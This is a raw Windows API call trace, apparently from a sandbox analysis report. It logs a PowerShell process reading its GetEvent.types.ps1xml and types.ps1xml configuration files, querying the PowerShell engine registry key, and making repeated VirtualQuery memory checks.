	[0337.028] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acfc0 | out: lpFileInformation=0x1acfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0337.028] SetErrorMode (uMode=0x1) returned 0x1
	[0337.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1accf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0337.029] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad0a8 | out: phkResult=0x1ad0a8*=0x31c) returned 0x0
	[0337.029] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad02c, lpData=0x0, lpcbData=0x1ad028*=0x0 | out: lpType=0x1ad02c*=0x1, lpData=0x0, lpcbData=0x1ad028*=0x56) returned 0x0
	[0337.030] CoTaskMemAlloc (cb=0x5a) returned 0x1b814740
	[0337.030] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acffc, lpData=0x1b814740, lpcbData=0x1acff8*=0x56 | out: lpType=0x1acffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acff8*=0x56) returned 0x0
	[0337.030] CoTaskMemFree (pv=0x1b814740) 
	[0337.030] RegCloseKey (hKey=0x31c) returned 0x0
	[0337.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1accf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0337.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0337.050] GetSystemInfo (in: lpSystemInfo=0x1abce0 | out: lpSystemInfo=0x1abce0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0337.050] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.403] SetErrorMode (uMode=0x1) returned 0x1
	[0337.404] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0337.404] GetFileType (hFile=0x31c) returned 0x1
	[0337.404] SetErrorMode (uMode=0x1) returned 0x1
	[0337.404] GetFileType (hFile=0x31c) returned 0x1
	[0337.404] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.405] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.405] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.405] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.405] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.405] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.406] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.406] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.406] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.407] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.407] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.407] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.407] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.407] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.408] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.408] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.408] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.409] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.410] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.410] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.410] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.410] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.411] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.411] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.411] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.411] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.411] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.412] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.412] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.412] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.412] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.413] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.413] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.415] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.415] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.415] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.415] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.416] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.416] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.416] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.420] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1000, lpOverlapped=0x0) returned 1
	[0337.420] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x1b4, lpOverlapped=0x0) returned 1
	[0337.420] ReadFile (in: hFile=0x31c, lpBuffer=0x2d22a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad048, lpOverlapped=0x0 | out: lpBuffer=0x2d22a50*, lpNumberOfBytesRead=0x1ad048*=0x0, lpOverlapped=0x0) returned 1
	[0337.420] CloseHandle (hObject=0x31c) returned 1
	[0337.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0337.420] SetErrorMode (uMode=0x1) returned 0x1
	[0337.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acfc0 | out: lpFileInformation=0x1acfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0337.421] SetErrorMode (uMode=0x1) returned 0x1
	[0337.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1accf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0337.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad0a8 | out: phkResult=0x1ad0a8*=0x31c) returned 0x0
	[0337.421] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad02c, lpData=0x0, lpcbData=0x1ad028*=0x0 | out: lpType=0x1ad02c*=0x1, lpData=0x0, lpcbData=0x1ad028*=0x56) returned 0x0
	[0337.421] CoTaskMemAlloc (cb=0x5a) returned 0x3ec2f0
	[0337.421] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acffc, lpData=0x3ec2f0, lpcbData=0x1acff8*=0x56 | out: lpType=0x1acffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acff8*=0x56) returned 0x0
	[0337.421] CoTaskMemFree (pv=0x3ec2f0) 
	[0337.421] RegCloseKey (hKey=0x31c) returned 0x0
	[0337.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1accf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0337.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0337.874] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.879] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.880] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.880] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.880] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.880] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.881] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.883] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.342] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.343] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.344] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.345] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.346] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.347] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.350] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.350] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.357] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.364] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.364] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.365] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.365] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.365] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.365] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.365] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.366] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.366] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0338.367] VirtualQuery (in: lpAddress=0x1abd90, lpBuffer=0x1acc50, dwLength=0x30 | out: lpBuffer=0x1acc50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
